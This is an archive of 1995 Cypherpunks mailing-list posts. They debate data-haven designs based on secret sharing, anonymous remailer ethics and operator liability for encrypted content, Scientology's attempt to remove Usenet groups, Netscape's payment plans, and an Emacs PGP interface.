On Mon, 16 Jan 1995, Johnathan Corgan wrote: > > It just occurred to me when reading this another method for ensuring > > the "I can't tell what's in it" condition with a data haven operator. > > Why not use a secret sharing system where the contraband data is > > split into a number of pieces and sent to different havens? Good, but still has most of the same old risks. Alice asks Dave's Data Haven to store stuff, and later retrieves it. Dave doesn't want to be able to know what's in it. There are three main threat periods - at receipt of the data, during storage, and at retrieval. Secret sharing is great for the storage period, assuming the data havens are in different jurisdictions and the cops can't force the operator (Dave) to go retrieve all the pieces. However, at receipt of the data, it's all in one place, Dave's inbox. If Alice encrypted it safely, or secret-shared it herself, great! But if Alice is a narc trying to entrap Dave with plaintext ThoughtCrime, or Alice's key has been compromised, anything in Dave's inbox is still toast, even if anything that's been split and stored is safer than if it had been stored unsplit. So he either needs to split it fast, shortening the window, or find a way to blind his mail before processing it, or split it before reading it. Splitting before reading isn't impossible in a stream environment. Define a protocol that looks like SMTP, but opens up three outgoing streams as well as an incoming stream, and uses standard mail formats. While reading the headers from Alice (either the real contents or just the handshakes at the beginning), Dave's receiver thinks about them and sends some meaningful headers to Moe, Larry, and Curly. Once the message body starts, instead of storing the incoming bytes, Dave sends every other byte to Moe or Larry, and the xors to Curly.* If he wants to get fancy, he can even encrypt the data with a stream cypher as he goes along, giving half the key to each of them. 
That way, Dave's system really only has knowledge of the headers, plus one line at a time of incriminating data on the fly. And his partners can't give anything away either; they're just stooges. * If the connections to and storage by Moe and Larry are reliable enough, Curly doesn't really need to be involved, but the xor business lets you reconstruct everything from just two parts. Bill "Privacy is not a crime!" From erc at s116.slcslip.indirect.com Tue Jan 17 00:53:03 1995 From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin]) Date: Tue, 17 Jan 95 00:53:03 PST Subject: Jude Milhon in WIRED In-Reply-To: <199501161819.KAA14478@netcom19.netcom.com> Message-ID: > Anyway, many of the folks "Wired" and the other hype-zines interview > are indeed strange and marginal. To be expected. There are only so > many of the standard "talking heads" that can be interviewed (the > stand-bys like Engelbart, Nelson, Toffler, Pournelle, etc.). > > Frankly, I'd rather see a story on "Zippies," about which I'd heard > nothing substantive before, than Yet Another Ted Nelson Story, about > which I've heard entirely too much over the past decade. (Not to > insult Ted--Hi, Ted!--but there are only so many ways to tell the > Xanadu story...time for new approaches.) > > I know some folks in the crypto/PGP community who were quite miffed > that such "marginal" folks as Eric Hughes, John Gilmore, and I were > featured on the cover of "Wired" 1.2 two years ago...they naturally > saw themselves as being more worthy, as perhaps they were....such is > life. The "credit assignment problem" in evolution and genetic > programming remains a tough one. I'm not sure that that's the case. Just because you move in dramatically politically incorrect circles (no insult intended) you may tend to get interviewed more than, say, I would. The fact that I might be working on more important or interesting things is completely irrelevant.
Cypherpunks is 'hot', so the press goes to who are perceived to be the 'movers and shakers' and they are talked to. The people working behind the scenes on stuff often are ignored in deference to those who are more visible. Again, no insult intended, but I think there's a large measure of truth in it. The same people keep getting the press while the larger bulk of the population gets ignored. It's also geographically-oriented, too - the folks on the West Coast tend to get the majority of the press, followed by the East Coast. Anyone in between is basically ignored. I guess the press thinks that no one outside of Silicon Valley or Boston is working on anything of any substance. Hell, look at Linux - that was done by a guy in Finland, and a college student at that. I'll bet that's rather embarrassing to the "hot shots" in Cupertino :) -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi ** PGP encrypted email preferred! ** Cop: "How many beers have you had tonight, bro?" Suspect: "Seventy." -- from the TV show "Cops" From asgaard at sos.sll.se Tue Jan 17 02:06:23 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Tue, 17 Jan 95 02:06:23 PST Subject: Abuse and Remailer Ethics In-Reply-To: Message-ID: This thread illustrates (at least if setup's like this are worthy of a place in Raph's list) that penet.fi is the safest way to go for the moment. I would just hate it to have my head on the plate of a remailer operator who takes an interest in subtile ethical discussion of whether to sell me out or not.
Mats From quester at eskimo.com Tue Jan 17 03:01:38 1995 From: quester at eskimo.com (Charles Bell) Date: Tue, 17 Jan 95 03:01:38 PST Subject: Scientologys Attempts In-Reply-To: <9501161644.AA06046@elysion.iaks.ira.uka.de> Message-ID: On Mon, 16 Jan 1995, Hadmut Danisch wrote: > > I just had a view into the alt.religion.scientology and > alt.clearing.technology newsgroups. There are some messages > about a Scientology decision to shut down every internet traffic > about Scientology. If the messages are true, Scientology sent > rmgroup Control messages to remove the groups. > > The request to stop the remailers seems to come from the > same people... > After reading the lawyer's threatening letter I tried to check out the two newsgroups mentioned, and was told they do not exist. (This is not a local filter here; Eskimo does not censor newsgroups.) So have they been deleted? If so, by whom and how? What is 'rmgroup' and who has the authority to remove alt. groups? Charles Bell From danisch at ira.uka.de Tue Jan 17 04:23:00 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Tue, 17 Jan 95 04:23:00 PST Subject: Scientologys Attempts Message-ID: <9501171221.AA06681@elysion.iaks.ira.uka.de> > After reading the lawyer's threatening letter I tried to check out the > two newsgroups mentioned, and was told they do not exist. (This is not a > local filter here; Eskimo does not censor newsgroups.) They still exist at our local server (E.I.S.S., University of Karlsruhe, Germany) and contain messages (even from America). Seems as they were successful in deleting the group at some servers. > So have they been > deleted? If so, by whom and how? Find out... > What is 'rmgroup' and The usenet method to remove groups. A special message with a control line in the header. > who has the > authority to remove alt. groups? Don't know...
Hadmut From anonymous-remailer at xs4all.nl Tue Jan 17 06:07:01 1995 From: anonymous-remailer at xs4all.nl (Name withheld on request) Date: Tue, 17 Jan 95 06:07:01 PST Subject: (none)Re: Abuse and Remailer Ethics In-Reply-To: Message-ID: <199501171405.AA17997@xs1.xs4all.nl> In article , Mats Bergstrom wrote: > > This thread illustrates (at least if setup's like this are > worthy of a place in Raph's list) that penet.fi is the safest > way to go for the moment. I would just hate it to have my > head on the plate of a remailer operator who takes an interest > in subtile ethical discussion of whether to sell me out or not. > > Mats > > This comment is grossly unfair. Obviously Homer is going to a lot of effort to operate his remailer in the best way possible. It's easy for others to be critical. "head on a plate" is a strong term to use, given Homer made it clear he would not reveal the identity of an anonymous user without a court order. Also, one wonders to what end remailers are being put by people who are worried about being "sold out". It's always been a good policy to use a foreign mailer in a chain where anonymity is critically important. That doesn't mean it's OK to make Homer the whipping boy. From ddt at lsd.com Tue Jan 17 06:32:57 1995 From: ddt at lsd.com (Dave Del Torto) Date: Tue, 17 Jan 95 06:32:57 PST Subject: Jude Milhon in WIRED Message-ID: Anyone with any dang sense left at all knows that St. Jude is the secret CypherGoddess behind this whole eff-in' thing, besides being the Patron Saint of Hopeless Causes... ;) dave _________________________________________________________________________ "There are three sides to every issue: my side, your side and the side of the truth." 
-Babatunde Olatunji From jalicqui at prairienet.org Tue Jan 17 07:46:34 1995 From: jalicqui at prairienet.org (Jeff A Licquia) Date: Tue, 17 Jan 95 07:46:34 PST Subject: Scientologys Attempts In-Reply-To: Message-ID: On Tue, 17 Jan 1995, Charles Bell wrote: > On Mon, 16 Jan 1995, Hadmut Danisch wrote: > > I just had a view into the alt.religion.scientology and > > alt.clearing.technology newsgroups. There are some messages > > about a Scientology decision to shut down every internet traffic > > about Scientology. If the messages are true, Scientology sent > > rmgroup Control messages to remove the groups. > > > > The request to stop the remailers seems to come from the > > same people... > After reading the lawyer's threatening letter I tried to check out the > two newsgroups mentioned, and was told they do not exist. (This is not a > local filter here; Eskimo does not censor newsgroups.) So have they been > deleted? If so, by whom and how? What is 'rmgroup' and who has the > authority to remove alt. groups? An 'rmgroup' is a control message used by Usenet when a group needs to be removed globally. Etiquette suggests that only big, important people should send these out, but technically anyone can send one. I followed the Scientology debate with little interest until yesterday, when I fired up my newsreader and was asked "Subscribe to new group alt.religion.scientology?" At that point, I knew that the real war had begun. :-) From what I was able to ascertain here, an rmgroup was sent out, followed soon after by a newgroup (or two or three or...). My news server doesn't honor newgroups in the alt hierarchy automatically as a rule, but did so in this case for some reason. News server: news.cso.uiuc.edu, on the University of Illinois Urbana-Champaign campus. ---------------------------------------------------------------------- Jeff Licquia (lame .sig, huh?) | Finger for PGP 2.6 public key jalicqui at prairienet.org | Me? Speak for whom?
You've got licquia at cei.com (work) | to be kidding! From hroller at metronet.com Tue Jan 17 08:14:44 1995 From: hroller at metronet.com (Michael L. Acklin) Date: Tue, 17 Jan 95 08:14:44 PST Subject: Premail PGP Keys Message-ID: Ralf, I hate to bother you, but I am setting up your premail program and tried the "premail -getkeys" but it never works. I tried to manually finger Matt's Pub Key area, but looks like he is down or has a different address. Is there somewhere else I can try to get the PGP Keys for the remailers, or does Matt have a different address? Any help would really be appreciated. Also does anyone have a patch for PINE 3.9X to get premail to work. I know I am kinda behind but just starting out and would really appreciate any help I can get. Again Thanks in Advance.... Mike Acklin ----------------------> hroller at metronet.com From jamesd at netcom.com Tue Jan 17 09:00:09 1995 From: jamesd at netcom.com (James A. Donald) Date: Tue, 17 Jan 95 09:00:09 PST Subject: Scientologys Attempts In-Reply-To: <9501171221.AA06681@elysion.iaks.ira.uka.de> Message-ID: On Tue, 17 Jan 1995, Hadmut Danisch wrote: > > > So have they been > > deleted? If so, by whom and how? > > Find out... > > > > What is 'rmgroup' and > > The usenet method to remove groups. A special message > with a control line in the header. > > > who has the > > authority to remove alt. groups? Anybody has the power. Nobody has the authority. It should be done only when there is a general consensus, which is obviously not the case here. This is a classic case of net abuse. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from James A. Donald the arbitrary power of the omnipotent state. 
jamesd at netcom.com http://www.catalog.com/jamesd/ From jya at pipeline.com Tue Jan 17 09:53:02 1995 From: jya at pipeline.com (John Young) Date: Tue, 17 Jan 95 09:53:02 PST Subject: Abuse and Remailer Ethics Message-ID: <199501171752.MAA21698@pipe2.pipeline.com> On Tue, 17 Jan 1995 anonymous-remailer at xs4all.nl (Name withheld on request) said: >This comment is grossly unfair. Obviously Homer is going to a lot of effort to >operate his remailer in the best way possible. > >It's easy for others to be critical. "head on a plate" is a strong term to >use, given Homer made it clear he would not reveal the identity of an anonymous >user without a court order. Also, one wonders to what end remailers are being >put by people who are worried about being "sold out". > >It's always been a good policy to use a foreign mailer in a chain where >anonymity is critically important. That doesn't mean it's OK to make Homer the >whipping boy. I agree that it's a bit much to expect the remailer operator to heroically perform beyond what any of us would do in the same lonely spot under duress. Tim has written recently on another list that the USG grabs enemies in other domains when the national interests are at stake -- the 800-pounder can define any of its actions legal, or to hell with legal niceties as the Beast opts, the picky lawyers can sort it out later, or never. Does not Duncan and others have wisdom on this: Don't roll over out of ignorance and faint-heartedness, but do carefully protect your keister, with feet-on-ground planning, mercury-technology and out-wits. Watch for signs of sneak attack through the guy being squeezed next door, or by a cahoots-machine zipping psy-war toot-alarms to foster fearful quiescence. Some warning examples may be in the offing in the rising heat of dreaded horse-threats to civil society. If so, some will be arranged by provocateurs like past G-guy tricks. So it goes. So what. 
Nesta said, it's fun to lance swollen infected over-controlling heads. From jamesd at netcom.com Tue Jan 17 10:27:45 1995 From: jamesd at netcom.com (James A. Donald) Date: Tue, 17 Jan 95 10:27:45 PST Subject: Scientology and remailers. Message-ID: Posting the truth about Scientology, in the face of harassment and threats by scientologists, is an excellent example of the legitimate use of remailers, as is alt.abuse.recovery, and talk.politics.china --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from James A. Donald the arbitrary power of the omnipotent state. jamesd at netcom.com http://www.catalog.com/jamesd/ From jrochkin at cs.oberlin.edu Tue Jan 17 10:48:34 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Tue, 17 Jan 95 10:48:34 PST Subject: Abuse and Remailer Ethics Message-ID: >This thread illustrates (at least if setups like this are >worthy of a place in Raph's list) that penet.fi is the safest >way to go for the moment. I would just hate it to have my >head on the plate of a remailer operator who takes an interest >in subtle ethical discussion of whether to sell me out or not. If you chain it through 3 or 4 remailers with PGP, then pretty much all 3 or 4 of them have got to decide to sell you out. I trust Julf a lot, but I'm not sure I trust him four times as much as every other remailer operator. Or something like that. You can also probably use penet as a link on your larger chain, although I've never tried this to see how it works. And I would note that the "subtle ethical discussion" seemed to consist of the operator trying to figure out what he should do in the future about this sort of thing, and he never even seemed to consider turning over the name of the anon user.
Although he did acknowledge that in the future he might, or might work with other operators to try and discover a True Name. *shrug* From asgaard at sos.sll.se Tue Jan 17 11:13:11 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Tue, 17 Jan 95 11:13:11 PST Subject: (none) In-Reply-To: <199501171405.AA17997@xs1.xs4all.nl> Message-ID: On Tue, 17 Jan 1995, Name withheld on request wrote: > wonders to what end remailers are being put by people who are worried > about being "sold out". The fundamental principle here is that an e-mail message is just so many bits of 1's and 0's. It can never, in its own capacity, steal, molest or kill. It is therefore not unethical to run a no-log 'fortress remailer' and auto-delete ALL complaints, without exception. It might not be feasible to do so if one wants to stay out of jail, but hopefully this will change with the rapid increase in country domains and the soon-to-come digicash market. Discussions of programming to make fortress remailers work and to make them easily exportable to African Linux-boxes are interesting. So are discussions of expected repercussions on society. Ethical discussions of what is abuse or not are better left to the clergy. Mats From asgaard at sos.sll.se Tue Jan 17 11:50:55 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Tue, 17 Jan 95 11:50:55 PST Subject: remailer security In-Reply-To: Message-ID: > If you chain it through 3 or 4 remailers with PGP, then pretty much all 3 > or 4 of them have got to decide to sell you out. I trust Julf a lot, but > I'm not sure I trust him four times as much as every other remailer > operator. Or something like that. I am familiar with this argument and agree. In the discussed case the alleged abuser had only used one remailer (on a site that keeps logs world readable at that!). Laziness, I guess. There are ways of multiple chaining for the lazy, though: C2 lets you pick the chained sites by clicking on a web-page (but does it encrypt??).
Mats From jalicqui at prairienet.org Tue Jan 17 12:27:23 1995 From: jalicqui at prairienet.org (Jeff Licquia) Date: Tue, 17 Jan 95 12:27:23 PST Subject: (none) Message-ID: <9501172027.AA24378@firefly.prairienet.org> Mats Bergstrom wrote: >On Tue, 17 Jan 1995, Name withheld on request wrote: > >> wonders to what end remailers are being put by people who are worried >> about being "sold out". > >The fundamental principle here is that an e-mail message is just so >many bits of 1's and 0's. It can never, in its own capacity, steal, >molest or kill. It is therefore not unethical to run a no-log 'fortress >remailer' and auto-delete ALL complaints, without exception. It might >not be feasible to do so if one wants to stay out of jail, but hopefully >this will change with the rapid increase in country domains >and the soon-to-come digicash market. Discussions of programming to >make fortress remailers work and to make them easily exportable to >African Linux-boxes are interesting. So are discussions of expected >repercussions on society. Ethical discussions of what is abuse or not >are better left to the clergy. Here comes the clergy! :-) I'm sure that when your hypothetical remailer comes up and I decide to spam you with your own words (now I wouldn't do that, now would I? ;-), your sysadmin will be comforted by knowing that it's only ones and zeros filling his hard disk. He would be especially comforted if I spammed postmaster at wherever.you.are rather than your own account in a move to protect your own anonymity. Advocating a remailer such as you describe is only possible in a world where anonymity is considered the supreme good, a goal to achieve no matter how many other ethical rules we break. In the real world, however, there will always be problems with "acceptable use" and "abuse", along with the additional problems with establishing policy and so on.
From beattie at CSOS.ORST.EDU Tue Jan 17 12:28:42 1995 From: beattie at CSOS.ORST.EDU (Brian Beattie) Date: Tue, 17 Jan 95 12:28:42 PST Subject: (none) In-Reply-To: Message-ID: On Tue, 17 Jan 1995, Mats Bergstrom wrote: > On Tue, 17 Jan 1995, Name withheld on request wrote: > > > wonders to what end remailers are being put by people who are worried > > about being "sold out". > > The fundamental principle here is that an e-mail message is just so > many bits of 1's and 0's. It can never, in its own capacity, steal, I disagree, one can use e-mail to steal. E-mail consumes resources, resources for which the sender may have no right to use. If the sender is sending messages which the recipient does not wish to receive then his resources are being taken. If the recipient has no way of stopping the messages then the recipient's resources are being taken against the recipient's will and the recipient should be able to have the messages stopped before they consume the recipient's resources. Brian Beattie | [From an MIT job ad] "Applicants must also have | extensive knowledge of UNIX, although they should beattie at csos.orst.edu | have sufficiently good programming taste to not Fax (503)754-3406 | consider this an achievement." From bdolan at use.usit.net Tue Jan 17 12:33:02 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Tue, 17 Jan 95 12:33:02 PST Subject: Internet News: NNBC News Story moved to tonight (Tuesday) (fwd) Message-ID: ---------- Forwarded message ---------- Date: Tue, 17 Jan 1995 14:23:11 -0500 From: Craig Peterson To: Multiple recipients of list Subject: INFO: NBC Nightly News Story moved to tonight (Tuesday) A story regarding the Internet, with some sort of mention of NRA.org, should be on the NBC Nightly News with Tom Brokaw tonight. Craig.
From rfb at lehman.com Tue Jan 17 12:35:13 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Tue, 17 Jan 95 12:35:13 PST Subject: Abuse and Remailer Ethics In-Reply-To: Message-ID: <9501172032.AA29703@cfdevx1.lehman.com> Date: Tue, 17 Jan 1995 11:06:16 +0100 (MET) From: Mats Bergstrom This thread illustrates (at least if setups like this are worthy of a place in Raph's list) that penet.fi is the safest way to go for the moment. That depends on your threat model. For most, chaining is safer than penet. I would just hate it to have my head on the plate of a remailer operator who takes an interest in subtle ethical discussion of whether to sell me out or not. Your characterization of what Homer has said strikes me as extremely inaccurate. Rick From unicorn at access.digex.net Tue Jan 17 12:39:06 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Tue, 17 Jan 95 12:39:06 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: On Mon, 16 Jan 1995, Johnathan Corgan wrote: > Date: Mon, 16 Jan 95 18:14:26 PST > From: Johnathan Corgan > To: Robert Rothenberg , > Black Unicorn > Cc: cypherpunks at toad.com > Subject: Re: Another problem w/Data Havens... > > -----BEGIN PGP SIGNED MESSAGE----- > > >Data havens that can split data to two or more locations in separate > >jurisdictions can effectively ignore attention from authorities not > >related to the site management or site performance. Encryption mandated > >sites can also take this stance, while encryption is legal in any event. > > It just occurred to me when reading this another method for ensuring the > "I can't tell what's in it" condition with a data haven operator. Why not > use a secret sharing system where the contraband data is split into a number > of pieces and sent to different havens?
It could be argued that the individual > pieces are not the same as the whole, and there is absolutely no way the > operator could recover the original from a given piece (thus providing > plausible deniability.) > > Using M by N secret sharing, with M < N, you build in some redundancy in case > one of the havens gets shutdown. This was essentially my point, phrased much more precisely. I believe this has been suggested, even discussed at length before on the list. Just from a structure standpoint, the haven could segment the data, use some sort of encryption, and then send an encrypted message containing the "resegmenting key." Theoretically the haven would destroy the resegmenting key after generating it and sending it, leaving the original sender with the only copy. Trust in the data haven operator is bolstered by his or her interest in not knowing the contents of the data, or the retrieval key for the data, lest he or she be vulnerable to authority scrutiny. > == > Johnathan Corgan "Violence is the last refuge of the incompetent." > jcorgan at scruznet.com -Isaac Asimov -uni- (Dark) -- 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Tue Jan 17 12:49:59 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Tue, 17 Jan 95 12:49:59 PST Subject: Another problem w/Data Havens... In-Reply-To: <9501170829.AA10034@anchor.ho.att.com> Message-ID: On Tue, 17 Jan 1995 wcs at anchor.ho.att.com wrote: > Date: Tue, 17 Jan 95 03:29:17 EST > From: wcs at anchor.ho.att.com > To: grendel at netaxs.com > Cc: cypherpunks at toad.com > Subject: Re: Another problem w/Data Havens... > > > Liability is a legal issue, not a technical one. > (Catchability is a technical issue.) BING! > > Alice asks Dave's Data Haven to store stuff, and later retrieves it. > Dave doesn't want to be able to know what's in it.
> There are three main threat periods - at receipt of the data, > during storage, and at retrieval. Secret sharing is great for > the storage period, assuming the data havens are in different > jurisdictions and the cops can't force the operator (Dave) > to go retrieve all the pieces. > > However, at receipt of the data, it's all in one place, Dave's inbox. > If Alice encrypted it safely, or secret-shared it herself, great! > But if Alice is a narc trying to entrap Dave with plaintext ThoughtCrime, > or Alice's key has been compromised, anything in Dave's inbox is > still toast, even if anything that's been split and stored is safer > than if it had been stored unsplit. So he either needs to split it fast, > shortening the window, or find a way to blind his mail before processing it, > or split it before reading it. I found this very insightful. All the more reason to mandate encryption, or to encrypt all plaintext on arrival. > > Splitting before reading isn't impossible in a stream environment. > Define a protocol that looks like SMTP, but opens up three outgoing > streams as well as an incoming stream, and uses standard mail formats. > While reading the headers from Alice (either the real contents or just the > handshakes at the beginning), Dave's receiver thinks about them > and sends some meaningful headers to Moe, Larry, and Curly. > Once the message body starts, instead of storing the incoming bytes, > Dave sends every other byte to Moe or Larry, and the xors to Curly.* > If he wants to get fancy, he can even encrypt the data with a stream > cypher as he goes along, giving half the key to each of them. > That way, Dave's system really only has knowledge of the headers, > plus one line at a time of incriminating data on the fly. > And his partners can't give anything away either; they're just stooges. 
> > * If the connections to and storage by Moe and Larry are reliable enough, > Curly doesn't really need to be involved, but the xor business lets > you reconstruct everything from just two parts. I like the pure elegance of this solution. Are there implemented DH codes running around anywhere? > > > Bill > > "Privacy is not a crime!" > 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From cactus at seabsd.hks.net Tue Jan 17 13:14:09 1995 From: cactus at seabsd.hks.net (Gone Fission) Date: Tue, 17 Jan 95 13:14:09 PST Subject: Abuse and Remailer Ethics Message-ID: <199501172119.QAA09578@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- In article , Homer Wilson Smith wrote: > I am not presently on cypherpunks, so please include me in the >replies. It's a little (not a lot) rude to start a substantive conversation and not to listen in to the list for duration. Just my O. > Does a list owner have the right to demand blocking to his list, >with or without a vote of the list readers? I would say yes. And the power. They can filter them out at the level of the mailing address. Tell 'em to do their own work. Put it gently and politely, but if they're the list admin, they can easily filter out mail from specific addresses without bugging a busy remailer operator who is, after all, doing a service to the net much as the list admin is. "Scenario them rosily with a calculated ambiguity which they will be sure to understand." 
-- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] From habs at cmyk.warwick.com Tue Jan 17 13:22:51 1995 From: habs at cmyk.warwick.com (Harry S. Hawk) Date: Tue, 17 Jan 95 13:22:51 PST Subject: A Reason for Privacy Message-ID: <9501180022.AA08869@cmyk.warwick.com> Hi, I had a talk today with our Office Manager which reveals another reason why we need anon. system. That is to say a good reason we can hold up to the press, media and other people.. The Example: Job Ads.. These are often non on an Anon. basis. For example, the new york times will function as an anon. forwarder of job resumes... The office manager needs to have both the company name and the name of the person getting the resumes to be kept anonymous... From eric at remailer.net Tue Jan 17 13:28:41 1995 From: eric at remailer.net (Eric Hughes) Date: Tue, 17 Jan 95 13:28:41 PST Subject: Does encrypted equal safe? In-Reply-To: Message-ID: <199501172128.NAA06955@largo.remailer.net> From: marko at millcomm.com (Mark Oeltjenbruns) >If you can't read it, it's not kiddie-porn *for you*, although it >might be for someone with the key.
> So the fact that its not kiddie-porn *for me* makes it safe *for me* to be transporting or storing for others that know it is kiddie-porn? Do you want it to be, or not? This is exactly the situation I was talking about when I emphasized the need for a positive rhetoric. We have here a situation for which I see the need for a clear statement of position and persuasive arguments in its favor. The law gets created by discussion. If we as a group fail to articulate our positions, these positions won't be represented and, failing other advocates (who?), will have no place in the law. Legal support of privacy technology will be necessary for its long term acceptance. The structure of the argument quoted below is primarily that of "this can't be right". I can only infer advocacy that operators of privacy services must be primarily responsible for content. This is to say one of several things, none of which I desire. It is to say privacy service operators who don't know content and who don't know identity should not exist, because no sane person would take upon themselves the liability of the world. It is alternately to say that privacy service operators must know content and filter it. It is alternately to say that such operators must know identity and be able to transfer liability, and these last two are not mutually exclusive. If you don't want this situation, speak up now. I desire the approved existence of privacy services which offer true privacy and as completely ignorant as possible operators of them. >Encryption fragments meaning subjectively. A magazine, for example, >has a fixed center of meaning for all who can read the language. A >magazine looks the same to all who look at it. An encrypted file >looks different to those who have the key from those who do not. But why does the meaning of the data assume to change? Because I want it to. Meaning is subjective. 
If I see encrypted text, am I to be held responsible for having seen through an encryption for which I hold not the key? Merely because someone knows a transformation into a disapproved form does not mean that I do. If I take my stack of kiddie-porn and put it in a box with a big strong lock on it, in a way physically encrypting it, change the meaning of what I have? Ask your local postal or parcel service. Is your local letter carrier responsible for the possession of kiddie porn while walking around with the mail in their sack? I certainly hope not. That would be a ludicrous situation. More accurately, it would be an outrage. Pushing responsibility for interpretation, the ascertaining of meaning, onto people who transport and store either physical goods or information would be to require them to become deputies in enforcement. The policeman inside indeed! No one is required to love the State nor its dictates. >Encrypted data is fundamentally different from paper-and-ink data in >this way. The metaphor of "planting it on somebody" does not apply to >data that the "somebody" can't read. It is fundamentally a different process, but does that make it different from the locking the physical data in a box as above? It is identical in its removal of any knowledge of content from the state of mind of the holder. What is different is that encrypted data is even more clear in its removal of knowledge. With a physical container, the boundary of the container can be breached. With a crypto container, it is impossible. It seems to me that what you are saying is that because the data is in a form that I can't understand, I'm safe from trouble. Now it seems to me that this is not all that different from changing the form or appearance of physical data and saying I'm not responsible for it. If you personally enclose a physical object, you haven't removed your own state of knowledge about the contents. But if you give the package to someone else, they don't know the contents.
Even when the package changes hands, the state of knowledge doesn't. The War on Certain Drugs has had the unfortunate effect of stretching the imputations of knowledge to holders of Certain Drugs. If a single person denies a state of knowledge, yet has physical possession of some Certain Drug, a court may assume that the possessor is lying. And the fact that certain situations like this have been legislated badly makes them no less totalitarian. On the other hand, someone in the business of taking packages from many different people can reasonably argue that they have no specific knowledge of the contents of any of them. Now think of a remailer: If somebody gave me this box of stuff, stuff that I had no idea of what it was since it was *locked up*, to transport over to location X and I got busted half way there am I safe? I'll consider this a reasonable argument if you can show that some analogous delivery service has been busted in this way. And not all delivery services are common carriers. Can I say that even though someone is using me to spam or distribute kiddie porn, I have no reason to try and stop it since I don't know what they are doing? I can tell from this situation that you yourself wouldn't not feel comfortable running a remailer. So don't do that. I see you're already not doing that; good. Eric From eric at remailer.net Tue Jan 17 13:30:48 1995 From: eric at remailer.net (Eric Hughes) Date: Tue, 17 Jan 95 13:30:48 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: <199501172130.NAA06966@largo.remailer.net> From: Johnathan Corgan It just occurred to me when reading this another method for ensuring the "I can't tell what's in it" condition with a data haven operator. Why not use a secret sharing system where the contraband data is split into a number of pieces and sent to different havens? [...] 
Ok, Eric, go ahead and blast your holes in this argument :) How do you know that what you the operator of the storage service gets was generated by secret sharing? The suggestion of having certificates that say "I encrypted this" are interesting, but merely transfer the problem onto that signer. Eric From rah at shipwright.com Tue Jan 17 13:52:20 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 17 Jan 95 13:52:20 PST Subject: Netscape & future developments Message-ID: > >Date: Tue, 17 Jan 1995 10:42:50 -0800 >From: wbarr at leland.stanford.edu (William P. Barr) >To: apple-internet-providers at medraut.apple.com >Subject: Netscape & future developments >Message-ID: > >Hello All, > >I just attended a talk given by Marc Andreessen, co-founder of Netscape, >and he had several interesting things to say that you all might be >interested in. > >First off, Netscape plans to make the API to its browser available to 3rd >party developers in the near future. With a list of over 1300 things users >want added to the browser, he believes that other developers will be much >more effective at filling the demand. Could this move spawn the "Visual >Basic" of the internet? Perhaps ... > >Second, Netscape has formed some key partnerships. Most notably, DEC and >Sun will be redistributing Netscape server software through its channels. >It has also created an alliance with Bank Of America and Mastercard for >secured cash transactions. Netscape is also providing all the servers for >MCI's www services. > >Third, he said that by the end of this year, secured transactions will no >longer be rare. Currently the model of a transaction is: > > Customer ---> Merchant ---> Card Issuer > >The new model will be: > > Customer ---> Card Issuer ---> Merchant > >This new model requires that you only have to trust your card issuer and >the communications link from your machine to theirs.
The Card Issuer will >then verify the credit and notify the merchant of the validity of the >purchase. There are two major ramifications: First, you no longer have to >worry about the integrity of the merchant; second, this will allow card >issuers to change the rules for giving merchant status to businesses. Marc >predicted that by the end of the year, getting merchant status from several >major card issuing banks will be greatly simplified, allowing dozens of >businesses/services to spring up on the net, almost overnight. > >Finally, he said that the company is in the process of settling on a >distributor to get the browser into the retail store-fronts. > >If you have any more questions, just ask. > >Bill > >********************************************* >*William P. Barr (415) 723-6632 (work)* >*Multimedia Coordinator (415) 725-7398 (fax) * >*Stanford Computer Forum >* >*ERL 448/450 wbarr at cs.stanford.edu (business)* >*Stanford, CA, 94305-4055 wbarr at leland.stanford.edu (leisure)* >*USA "My opinion is mine and only mine* >********************************************* > ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From jackr at dblues.engr.sgi.com Tue Jan 17 14:20:54 1995 From: jackr at dblues.engr.sgi.com (Jack Repenning) Date: Tue, 17 Jan 95 14:20:54 PST Subject: pgp.el, as shown at the last PhysMeet Message-ID: <12096.790381237@dblues.engr.sgi.com> At this weekend's Physical Meeting, I demonstrated pgp.el, an interface to PGP for use from GNU Emacs. As I mentioned, this package is available from the standard Emacs lisp archives and other places.
